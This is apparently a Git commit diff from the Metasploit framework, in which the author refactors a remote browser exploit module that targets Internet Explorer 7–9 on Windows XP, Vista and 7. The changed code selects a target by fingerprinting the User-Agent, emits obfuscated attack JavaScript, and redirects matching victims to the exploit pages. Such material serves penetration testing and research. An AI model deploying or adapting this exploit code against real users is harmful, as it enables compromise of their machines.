Additional changes
Updated get_target function, comment for original author, possible bug in handling page redirection.bug/bundler_fix
sinn3r
parent
03815b47f8
commit
2db2c780d6
|
|
@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'unknown', # Some secret ninja
|
||||
'unknown', # via ZDI
|
||||
'eromang', # First public discovery
|
||||
'binjo',
|
||||
'sinn3r', # Metasploit
|
||||
|
|
@ -90,21 +90,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#If the user is already specified by the user, we'll just use that
|
||||
return target if target.name != 'Automatic'
|
||||
|
||||
if agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
|
||||
return targets[1] #IE 7 on Windows XP SP3
|
||||
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/
|
||||
return targets[2] #IE 8 on Windows XP SP3
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
|
||||
return targets[3] #IE 7 on Windows Vista
|
||||
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 8/
|
||||
return targets[4] #IE 8 on Windows Vista
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 8/
|
||||
return targets[5] #IE 8 on Windows 7
|
||||
elsif agent =~ /NT 6\.1/ and agent =~ /MSIE 9/
|
||||
return targets[6] #IE 9 on Windows 7
|
||||
else
|
||||
return nil
|
||||
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
|
||||
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
|
||||
|
||||
ie_name = "IE #{ie}"
|
||||
|
||||
case nt
|
||||
when '5.1'
|
||||
os_name = 'Windows XP SP3'
|
||||
when '6.0'
|
||||
os_name = 'Windows Vista'
|
||||
when '6.1'
|
||||
os_name = 'Windows 7'
|
||||
end
|
||||
|
||||
targets.each do |t|
|
||||
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
|
||||
vprint_status("Target selected as: #{t.name}")
|
||||
return t
|
||||
end
|
||||
end
|
||||
|
||||
return nil
|
||||
end
|
||||
|
||||
def junk(n=4)
|
||||
|
|
@ -294,7 +301,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
js.obfuscate
|
||||
end
|
||||
|
||||
html = <<-EOS
|
||||
html = %Q|
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
|
|
@ -309,7 +316,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
</script>
|
||||
</body>
|
||||
</html>
|
||||
EOS
|
||||
|
|
||||
|
||||
return html
|
||||
end
|
||||
|
|
@ -345,10 +352,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
print_status request.headers['User-Agent']
|
||||
agent = request.headers['User-Agent']
|
||||
uri = request.uri
|
||||
agent = request.headers['User-Agent']
|
||||
my_target = get_target(agent)
|
||||
|
||||
vprint_status("Requesting: #{uri}")
|
||||
print_status(agent)
|
||||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("Browser not supported, sending a 404: #{agent.to_s}")
|
||||
|
|
@ -356,15 +366,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return
|
||||
end
|
||||
|
||||
vprint_status("Requesting: #{request.uri}")
|
||||
|
||||
if request.uri =~ /#{@html2_name}/
|
||||
if uri =~ /#{@html2_name}/
|
||||
print_status("Loading #{@html2_name}")
|
||||
html = load_html2
|
||||
elsif request.uri =~ /#{@html1_name}/
|
||||
elsif uri =~ /#{@html1_name}/
|
||||
print_status("Loading #{@html1_name}")
|
||||
html = load_html1(cli, my_target)
|
||||
elsif request.uri =~ /\/$/ or request.uri =~ /#{this_resource}$/
|
||||
elsif uri =~ /\/$/ or (!this_resource.empty? and uri =~ /#{this_resource}$/)
|
||||
print_status("Redirecting to #{@html1_name}")
|
||||
send_redirect(cli, "#{this_resource}/#{@html1_name}")
|
||||
return
|
||||
|
|
|
|||
Loading…
Reference in New Issue